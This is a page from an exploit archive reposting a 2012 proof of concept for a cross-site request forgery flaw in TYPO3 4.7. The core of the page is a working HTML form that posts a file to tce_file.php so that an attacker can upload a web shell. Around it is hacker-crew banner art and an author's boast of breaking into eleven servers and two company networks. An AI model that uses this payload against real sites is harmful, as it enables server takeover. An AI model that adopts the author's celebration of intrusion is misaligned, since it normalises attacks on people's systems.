Advertisement






TYPO3 4.7 Cross Site Request Forgery

CVE Category Price Severity
CVE-2016-11123 CWE-352 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2012-06-08
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2012060031

Below is a copy:

# Happy Milw0rm 1337 Day!!! Congratulations all h4x0rz

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : TYPO3 v4.7 <= ShellUpload with (CSRF) Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# platform : php
# Type : CSRF - Remote -
# Security Risk : Critical
# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10
# Download : [http://typo3.org/download/]
###

# +> Description :
This exploit about cross-site request forgery (CSRF) Vulnerability
TYPO3 v4.7 allow remote attackers to upload a file via remote script/cmd's !

# +> Exploit/p0c :

<form action="http://127.0.0.1/typo3/tce_file.php" method="post" name="editform">
<input type="file" name="upload_31337" size="50" onclick="changed=1;" />
<input type="hidden" name="file[upload][31337][target]" />
<input type="hidden" name="file[upload][31337][data]" value="31337" />
<input type="submit" value="Upload Sh3ll !" />
<form>

############# << ThE|End

# -- Hackers day and legend story: -- #
# ---- ( Milw0rm - Old School - ) ---- #
-- Hi all HaCkers !
- Happy milw0rm 1337 DAY (leet-day) for all Hax0rS ../pene-testers ../and all Inj3ct0r users (^_^)
- Today is a biiiiiiiiiiig day about History and Legend for Hacking/Pene-Testing ...
- this Day about Created and Started a legend Milw0rm (http://en.wikipedia.org/wiki/Milw0rm)
- if you a Hax0r 0r Pene-Tester ,s0 you'r know about this day and this team (milw0rm)...
- milw0rm is change my life, and our live, and inj3ct0r keep the milw0rm project and target a live <3
- So....! what you doing in this big day .....!!?

- I'm busy with work ( Mechanical of drilling-rig :p ) xD
- but i do my real job ( Penetration Testing & Hacking & pWn'd ) <3
- my Results in this day (++ i'm very busy)
- Hacking 11 servers and get RDP/local r00t ..etc..
- Hacking 2 big Networks of some Companies Here in Hassi Messaoud (Algeria)
- Discovering some vulners/bug's and make exploit/p0c ( Pene-Testing <3 <3 ^.^ )
++ and...and...and...
- !(o_O) and you ... whats a hax0r with n't Hacking in this Day !!?

<- Wishes/Greetings t0 all Milw0rm 1337 cr3w ( 0ld School )->
Keystroke, JF, ExtreemUK, savec0re, VeNoMouS

<- Wishes/Greetings t0 All Inj3ct0r 1337day cr3w ->
r0073r, Sid3^effectS, r4dc0re, CrosS, KedAns-Dz (me :p), Indoushka
KnocKout, SeeMe, Kalashinkov3, ZoRLu, anT!-Tr0J4n, Angel Injection, NuxbieCyber

<- Wishes/Greetings t0 All Algerian 1337 Hax0rS ->
Inj3ct0rs Dz: KedAns (me), Indoushka, Kalashinkov3
Caddy-Dz, Jago-dz, Kha&miX, Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Over-X
Soucha, Chevr0sky, Black-ID, BrOx-Dz, Lagripe-dz, Ma3sTr0-Dz, Barbaros DZ, Dr.Ride
...All OthErS and All mY Friends ^.^ ! Happy Milw0rm 1337 Day !!!!!!

# ./KedAns-Dz (1, 2, 3,.. viva l'algerie)


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum